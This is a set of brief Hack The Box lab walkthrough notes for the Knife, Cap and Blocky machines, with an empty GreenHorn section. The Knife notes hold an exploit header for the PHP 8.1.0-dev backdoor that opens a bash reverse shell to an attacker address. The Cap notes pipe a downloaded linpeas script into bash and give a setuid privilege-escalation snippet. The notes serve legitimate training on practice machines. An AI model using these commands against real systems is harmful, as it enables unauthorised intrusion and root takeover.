[Back](../HTBMachines.md)

#### Table of Contents:
- [Knife](#knife)
- [Cap](#cap)
- [Blocky](#blocky)
- [GreenHorn](#greenhorn)

## Knife

**Link:** [Knife](https://app.hackthebox.com/machines/Knife)

>[!hint] PHP 8.1.0-dev - 'User-Agentt' Remote Code Execution
> User-Agentt: zerodiumsystem("bash -c 'bash -i >& /dev/tcp/<your_ip>/<port> 0>&1'");

- Upgrade a linux reverse shell to a fully usable TTY shell

>[!hint] [GTFObins knife](https://gtfobins.github.io/gtfobins/knife/)

## Cap

**Link:** [Cap](https://app.hackthebox.com/machines/Cap)

>[!hint] Privileges Escalation
> `curl http://<target_ip>/linpeas.sh | bash` from `python3 -m http.server 80`
> **Files with capabilities**

```python
import os
os.setuid(0)
os.system("/bin/bash")
```

## Blocky

**Link:** [Blocky](https://app.hackthebox.com/machines/48)

- enumerate target
- brute force directories
- unzip file and decompile with [jad](https://web.archive.org/web/20080214075546/http://www.kpdus.com/jad.html)
- login as <user> and check privileges/permissions
- `sudo -l` | `sudo -i` | `sudo su`

>[!note] Linux Enumeration Tools
> That can be helpful
> *Linpeas*, *LES*, *LinEnum*

## GreenHorn

**Link:** [GreenHorn](https://app.hackthebox.com/machines/GreenHorn)
